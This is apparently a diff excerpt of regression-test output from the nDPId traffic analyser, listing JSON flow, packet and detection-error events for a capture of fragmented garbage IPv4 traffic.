00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6261,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244030777,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6261,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1534244030777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjQyMTQ2MzE5ODIwNTEpKCpc2AAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6262,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030777}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6262,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiZeJSQjQCMkJV4mKigqJl4="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6263,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030777}
@@ -13146,8 +13146,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6572,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAnJzZGx1aGdrZmRzYmtudmM="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6573,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244030779}
00342{"packet_event_id":1,"packet_event_name":"packet","packet_id":6573,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAi8udGdmdGc\/"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6574,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244031080,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6574,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1534244031080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkdSP0dSP3NSPzc0ODM5NinCaAAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6574,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244031080,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6574,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1534244031080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkdSP0dSP3NSPzc0ODM5NinCaAAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6575,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031080}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6575,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAigqJl4lJCNAIUAjJCVeJio="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6576,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031080}
@@ -13772,8 +13772,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6885,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiomXiUkI0AjJCVeJiooKiY="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6886,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244031084}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":6886,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAl4lJCMmKihL"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6887,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244031384,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6887,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1534244031384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAklKSEdGRDIqJkRGR0hKSybhaQAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6887,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244031384,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6887,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1534244031384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAklKSEdGRDIqJkRGR0hKSybhaQAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6888,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031384}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6888,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAl4lJCMjRVRSJVleVSZJKk8="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6889,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031384}
@@ -14398,8 +14398,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7198,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAjpoZGZsa2RhPkw8TU5CSEc="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7199,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244031388}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":7199,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkZERVcjQCQl"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7200,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244031688,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7200,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1534244031688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl5IQkdWCjQyMTQ2MzE5ODLvxgAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7200,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244031688,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7200,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1534244031688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl5IQkdWCjQyMTQ2MzE5ODLvxgAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7201,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031688}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7201,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjA1MSkoKiZeJSQjQCMkJV4="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7202,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031688}
@@ -15024,8 +15024,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7511,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiomXiUkI3JzZGx1aGdrZmQ="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7512,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244031693}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":7512,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAnNia252Yy8u"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7513,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244031993,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7513,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1534244031993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAnRnZnRnP0dSP0dSP3NSPzcd6AAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7513,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244031993,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7513,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1534244031993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAnRnZnRnP0dSP0dSP3NSPzcd6AAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7514,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031993}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7514,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjQ4Mzk2KSgqJl4lJCNAIUA="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7515,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031993}
@@ -15650,8 +15650,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7824,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAl4mKigpKComXiUkI0AjJCU="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7825,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244031998}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":7825,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAl4mKigqJl4l"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7826,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244032298,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7826,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1534244032298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiQjJiooS0lKSEdGRDIqJkRIiQAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7826,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244032298,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7826,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1534244032298,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiQjJiooS0lKSEdGRDIqJkRIiQAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7827,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032298}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7827,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkZHSEpLJl4lJCMjRVRSJVk="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7828,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032298}
@@ -16276,8 +16276,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8137,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAkkqT1B7IjpoZGZsa2RhPkw="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8138,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244032302}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":8138,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAjxNTkJIR0ZE"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8139,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244032602,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8139,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1534244032602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkVXI0AkJV5IQkdWCjQyMTQCqQAA"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8139,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244032602,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8139,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1534244032602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkVXI0AkJV5IQkdWCjQyMTQCqQAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8140,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032602}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8140,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjYzMTk4MjA1MSkoKiZeJSQ="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8141,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032602}
@@ -16902,8 +16902,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8450,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiQlXiYqKComXiUkI3JzZGw="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8451,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244032607}
